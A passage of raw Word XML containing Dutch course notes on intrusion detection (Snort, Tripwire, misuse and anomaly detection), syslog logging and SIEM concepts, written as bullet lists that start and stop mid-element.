        <w:t>Detecteert indringers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A9D58" w14:textId="44D05540" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Waarschuwt beheerders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240A93AF" w14:textId="068DC256" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Houdt indringers mogelijk tegen (IPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07634654" w14:textId="4A679E37" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Inbraakalarm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07650B1A" w14:textId="6082CFFC" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruikt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042D7F8C" w14:textId="4D4DF55D" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logboeken van web, firewall, routers, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1571E43F" w14:textId="7BCBAB43" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Binaire integriteitscontroles / Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CADEA1" w14:textId="04E7D6DE" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Eventlogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F76354E" w14:textId="7B4ED325" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netwerkpakketten checken op fingerprints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2ABAD8" w14:textId="77777777" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925"/>
    <w:p w14:paraId="192D768D" w14:textId="5B37C902" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925">
      <w:r>
        <w:t>2 soorten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029B600" w14:textId="77777777" w:rsidR="006E1925" w:rsidRDefault="006E1925" w:rsidP="006E1925"/>
    <w:p w14:paraId="0627359C" w14:textId="2C77B423" w:rsidR="006E1925" w:rsidRPr="008E45CE" w:rsidRDefault="008E45CE" w:rsidP="006E192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8E45CE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Misbruikdetectie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EECB61" w14:textId="2D0C4969" w:rsidR="008E45CE" w:rsidRDefault="008E45CE" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netwerk-IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4D7848" w14:textId="4B69004F" w:rsidR="008E45CE" w:rsidRPr="009A30E2" w:rsidRDefault="008E45CE" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A30E2">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SNORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7A152F" w14:textId="3C8B7BF3" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sniffers die pakketten parsen en vergelijken met aanvalspatronen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B85E5D" w14:textId="7C5D1E2A" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Werken passief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5008CAE9" w14:textId="1B5B2314" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netwerk met veel switches -&gt; krijgen niet alles te zien</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D6673" w14:textId="242FF563" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hoge bandbreedte -&gt; krijgen niet alles verwerkt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EE4E1" w14:textId="26BDFE34" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Host-IDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F7025" w14:textId="32CA0415" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analyseren van logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329739D" w14:textId="5E34A3C6" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Zoeken naar backdoors en Trojams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08451B4A" w14:textId="247BBE1F" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Integriteitscontrole van files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CDE4A9" w14:textId="76DE0979" w:rsidR="0079682D" w:rsidRPr="009A30E2" w:rsidRDefault="0079682D" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Gebruiken een </w:t>
      </w:r>
      <w:r w:rsidRPr="0079682D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C0A2CB" w14:textId="6C26AF8C" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Alleen op kritieke machines worden dit geïnstalleerd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFB3AB" w14:textId="3A3960E9" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A30E2">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TRIPWIRE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D32075" w14:textId="4E917F01" w:rsidR="007553A1" w:rsidRPr="009A30E2" w:rsidRDefault="007553A1" w:rsidP="007553A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Binair = 1 of 0 = true or false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D9DE12" w14:textId="22292EA2" w:rsidR="008E45CE" w:rsidRPr="008E45CE" w:rsidRDefault="008E45CE" w:rsidP="006E192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8E45CE">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Anomaliedetectie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD0981" w14:textId="7BD14CD7" w:rsidR="008E45CE" w:rsidRDefault="0079682D" w:rsidP="008E45CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conceptueel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D1813" w14:textId="231297C2" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="0079682D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Volgen het gedrag van de gebruiker en het verkeer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7EE93" w14:textId="73FBFFCB" w:rsidR="0079682D" w:rsidRDefault="0079682D" w:rsidP="009A30E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gedragt afwijkt? Onderzoeken!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D73E77" w14:textId="693F20B8" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="000740C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Worden getraind om het netwerk te leren kennen</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FCC">
        <w:t xml:space="preserve"> = t</w:t>
      </w:r>
      <w:r>
        <w:t>rainingsmode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22409C" w14:textId="0E7C7F1A" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="009A30E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Worden nadien in detectiemode geplaatst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5924CC67" w14:textId="73C281F4" w:rsidR="009A30E2" w:rsidRDefault="009A30E2" w:rsidP="009A30E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Moeten regelmatig bijgestuurd worden, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62555C" w14:textId="637167B0" w:rsidR="008E45CE" w:rsidRDefault="00A31EFB" w:rsidP="00A31EFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= FUZZY LOGIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399A15A" w14:textId="2AF711C4" w:rsidR="00A31EFB" w:rsidRDefault="00A31EFB" w:rsidP="00A31EFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maakt gebruikt van statistische berekeningen, normale verdeling, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32691B" w14:textId="550CFDDC" w:rsidR="00A31EFB" w:rsidRDefault="00817AB9" w:rsidP="00CE4DD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="20" w:name="_Toc453378509"/>
      <w:r w:rsidR="00CE4DD1">
        <w:lastRenderedPageBreak/>
        <w:t>Logging</w:t>
      </w:r>
      <w:r w:rsidR="00E264DE">
        <w:t xml:space="preserve"> &amp; SIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="6E73C9A9" w14:textId="77777777" w:rsidR="00817AB9" w:rsidRDefault="00817AB9" w:rsidP="00817AB9"/>
    <w:p w14:paraId="6B0C46C3" w14:textId="61831FCB" w:rsidR="00817AB9" w:rsidRDefault="005E4F21" w:rsidP="005E4F21">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E67983E" w14:textId="77777777" w:rsidR="005E4F21" w:rsidRDefault="005E4F21" w:rsidP="005E4F21"/>
    <w:p w14:paraId="67487922" w14:textId="3E9114B7" w:rsidR="005E4F21" w:rsidRDefault="005E4F21" w:rsidP="005E4F21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logging is belangrijk om intrusions op te sporen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C7A6A" w14:textId="1C18AE76" w:rsidR="005E4F21" w:rsidRDefault="005E4F21" w:rsidP="005E4F21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logging is belangrijk in rechtzaken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E9AC92" w14:textId="43EC9747" w:rsidR="005E4F21" w:rsidRDefault="00884069" w:rsidP="005E4F21">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logging moet veilig opgeslagen worden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43688733" w14:textId="1C178F23" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>R-DVD, Logboekserver, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66744FB7" w14:textId="30C2F726" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hackers willen deze aanpassen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75793595" w14:textId="73F508CA" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Alle logboekformaten standaardiseren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375C0EE7" w14:textId="48D82A43" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069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884069">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SYSLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA1C37" w14:textId="604A5C56" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IETF Standaard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C9344" w14:textId="6BF942F3" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Door meeste network devices gebruikt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDBD8D3" w14:textId="77777777" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Syslogserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC537C5" w14:textId="4A8D89C6" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= centrale opslag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB436D" w14:textId="068685EA" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>UDP poort 514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC2943" w14:textId="070F2A86" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gebruik logboek tools van trusted third parties (TTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057E594" w14:textId="0E4C98BE" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onafhankelijke logboek tool doet alles zelf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D688895" w14:textId="2B8C77FB" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logboeks vergelijken!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E3B28C" w14:textId="3B638BEA" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er bestaan ook tools die niet alleen logs produceren, maar ook analyseren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C400E8" w14:textId="2755154E" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hier kan AI op gebruikt worden op aanvalspatronen te herkennen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DA3E2" w14:textId="7391BCFC" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Intrusion detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F2316" w14:textId="390C0004" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Begin van een SIEM server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6965A8" w14:textId="72CC4171" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49057E54" w14:textId="77777777" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069"/>
    <w:p w14:paraId="20F77F98" w14:textId="48525EF4" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:r>
        <w:t>2-delig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED6BED" w14:textId="44EE1B7F" w:rsidR="00884069" w:rsidRPr="002118ED" w:rsidRDefault="00884069" w:rsidP="00884069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2118ED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SIM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6CCC81" w14:textId="41178116" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Security Information Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBFF173" w14:textId="69C9107A" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Log management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E950F" w14:textId="069723FD" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= om analyse te doen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A02B7" w14:textId="06630314" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidR="00A85E84">
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t>ong-</w:t>
      </w:r>
      <w:r w:rsidR="00A85E84">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>erm-</w:t>
      </w:r>
      <w:r w:rsidR="00A85E84">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>torage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C5DE6" w14:textId="790FE327" w:rsidR="00884069" w:rsidRPr="002118ED" w:rsidRDefault="00884069" w:rsidP="00884069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2118ED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>SEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDB6DCC" w14:textId="61504A0D" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Real Time Monitoring (Dashboards)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718A4A46" w14:textId="0933FC6F" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Logs worden gebruikt in realtime attacks te detecteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6035C0D8" w14:textId="6D0695E3" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doet cross-referencing van de data om een realtime analyse te doen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A67D943" w14:textId="1200D340" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Extra gegevens nodig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B1084C" w14:textId="206D2A59" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8019DD" w14:textId="384CAC3B" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SMP data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE63F0" w14:textId="49F84FEF" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Firewall events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70781631" w14:textId="0CCC0F43" w:rsidR="00884069" w:rsidRDefault="00884069" w:rsidP="00884069">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
